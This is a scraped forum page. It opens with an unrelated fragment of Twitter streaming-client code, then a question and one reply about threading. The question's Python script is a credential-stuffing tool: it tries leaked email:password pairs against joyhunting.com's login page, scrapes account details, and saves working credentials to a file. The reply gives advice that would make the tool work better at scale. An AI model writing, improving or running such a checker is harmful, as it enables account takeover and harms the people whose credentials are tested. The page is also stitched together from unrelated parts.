self.conn.setopt(pycurl.WRITEFUNCTION, self.handle_tweet)
def get_oauth_header(self):
""" Create and return OAuth header.
"""
params = {'oauth_version': '1.0',
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time())}
req = oauth.Request(method='POST', parameters=params, url='%s?%s' % (API_ENDPOINT_URL,
urllib.urlencode(POST_PARAMS)))
req.sign_request(oauth.SignatureMethod_HMAC_SHA1(), self.oauth_consumer, self.oauth_token)
return req.to_header()['Authorization'].encode('utf-8')
def start(self):
""" Start listening to Streaming endpoint.
Handle exceptions according to Twitter's recommendations.
"""
backoff_network_error = 0.25
backoff_http_error = 5
backoff_rate_limit = 60
while True:
self.setup_connection()
try:
self.conn.perform()
except:
# Network error, use linear back off up to 16 seconds
print 'Network error: %s' % self.conn.errstr()
print 'Waiting %s seconds before trying again' % backoff_network_error
time.sleep(backoff_network_error)
backoff_network_error = min(backoff_network_error + 1, 16)
continue
# HTTP Error
sc = self.conn.getinfo(pycurl.HTTP_CODE)
if sc == 420:
# Rate limit, use exponential back off starting with 1 minute and double each attempt
print 'Rate limit, waiting %s seconds' % backoff_rate_limit
time.sleep(backoff_rate_limit)
backoff_rate_limit *= 2
else:
# HTTP error, use exponential back off up to 320 seconds
print 'HTTP error %s, %s' % (sc, self.conn.errstr())
print 'Waiting %s seconds' % backoff_http_error
time.sleep(backoff_http_error)
backoff_http_error = min(backoff_http_error * 2, 320)
def handle_tweet(self, data):
""" This method is called when data is received through Streaming endpoint.
"""
self.buffer += data
if data.endswith('\r\n') and self.buffer.strip():
# complete message received
message = json.loads(self.buffer)
self.buffer = ''
msg = ''
if message.get('limit'):
print 'Rate limiting caused us to miss %s tweets' % (message['limit'].get('track'))
elif message.get('disconnect'):
raise Exception('Got disconnect: %s' % message['disconnect'].get('reason'))
elif message.get('warning'):
print 'Got warning: %s' % message['warning'].get('message')
else:
print 'Got tweet with text: %s' % message.get('text')
if __name__ == '__main__':
ts = TwitterStream()
ts.setup_connection()
ts.start()
please help me to resolve the issue with code

python thread queue question

Hell All.
i was made some python script with thread which checking some of account exist in some website
if i run thread 1 , it working well but if increase thread such like 3~5 and above,
result was very different compare with thread 1 and i was checked manually and
if i increase thread result was not correct.
i think some of my thread code have to tune or how about use Queue module ?
anyone can advice or tuneing my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data #정상 로그인
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원"
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for line in listhandle:
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %n.' % (maillist, currline)
exit
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break
Can You please specify what are different results?
From what I see, code is doing much more than verifying account.
From what I see, You're appending to a single file from multiple threads, I'd say it's not thread-safe.
Also, AFAIK Mechanize uses shared cookie storage for all requests, so they are probably interfering. Use separate mechanize.Browser() inside run() instead of mechanize.Request().

Categories

Resources